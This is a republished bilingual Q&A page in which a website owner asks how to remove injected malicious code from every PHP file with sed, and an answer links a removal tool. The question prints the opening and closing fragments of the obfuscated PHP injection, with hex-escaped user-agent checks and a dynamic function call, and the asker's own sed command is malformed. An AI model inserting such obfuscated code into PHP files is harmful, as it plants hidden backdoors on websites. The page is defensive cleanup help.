网站被黑客入侵,如何使用SED/GREP删除恶意代码 [英] Website hacked, how to remove malicious code with SED / GREP
本文介绍了网站被黑客入侵,如何使用SED/GREP删除恶意代码的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!
问题描述
我的网站被黑了.在每个php文件中添加一行代码.我不会在此处发布完整的代码,但是它以:
a website of mine is hacked. In every php file a line of code is added. I wont post the complete code here, but it starts with:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yudqgxmnlr =
结尾为:
$gzagexgpdc=substr($yudqgxmnlr,(34129-24016),(83-71)); $gzagexgpdc($xarchajboj, $ukumkvvgai, NULL); $gzagexgpdc=$ukumkvvgai; $gzagexgpdc=(759-638); $yudqgxmnlr=$gzagexgpdc-1; ?>
我尝试查找并替换为某些ssh命令,但似乎不起作用. (阅读:我对ssh的了解不足阻碍了该工作.)
I've tried finding and replacing with some ssh commands, but it doesnt seem to work. (Read: my lack of ssh knowledge gets in the way).
这是我最近的一次尝试:
This is my latest atempt:
sed -i '<?php if(!isset*gzagexgpdc-1; ?>//g’ *.php
有人可以帮助我吗?
推荐答案
您可以尝试以下操作: https://github .com/daniyalahmadk/RMCI
You can try this : https://github.com/daniyalahmadk/RMCI
只需要将代码放在框中并单击提交,它将从文件中搜索代码并将其全部删除一次.
Just need to put that code in box and hit submit, it will search code from files and remove them all once.
这篇关于网站被黑客入侵,如何使用SED/GREP删除恶意代码的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
查看全文